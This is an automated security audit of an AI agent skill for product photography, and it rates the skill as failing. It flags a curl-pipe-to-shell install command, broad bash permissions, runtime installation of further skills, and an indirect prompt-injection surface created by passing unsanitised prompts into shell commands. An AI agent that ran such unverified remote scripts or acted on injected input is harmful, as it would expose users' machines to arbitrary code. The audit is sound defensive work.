ai-product-photography
Fail
Audited by Gen Agent Trust Hub on Feb 19, 2026
Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADSPROMPT_INJECTION
Full Analysis
- REMOTE_CODE_EXECUTION (HIGH): The skill documentation instructs users to execute
curl -fsSL https://cli.inference.sh | sh. This pattern downloads a shell script from an untrusted external domain and executes it immediately without verification, allowing the server owner to execute arbitrary code on the host machine. - COMMAND_EXECUTION (MEDIUM): The skill requires permission to run bash commands (
infsh *). The provided examples include complex shell scripts with loops and variable interpolation, which could be exploited if user input is not properly sanitized before being passed to these commands. - EXTERNAL_DOWNLOADS (MEDIUM): The 'Related Skills' section suggests using
npx skills addto download and install multiple additional skills from an external repository at runtime. - PROMPT_INJECTION (LOW): The skill is vulnerable to indirect prompt injection because it ingests untrusted user input for image generation prompts without sanitization or boundary markers. While the primary capability is generating images, the agent's environment (which allows bash and file writes) makes this a potential attack surface if the agent processes the resulting tool outputs.
- Ingestion points: Prompt field in
infsh app runcommands. - Boundary markers: Absent; prompt strings are interpolated directly into shell arguments.
- Capability inventory: File writing, bash execution, and network access via the CLI tool.
- Sanitization: None provided in the implementation examples.
Recommendations
- HIGH: Downloads and executes remote code from: https://cli.inference.sh - DO NOT USE without thorough review
- AI detected serious security threats
Audit Metadata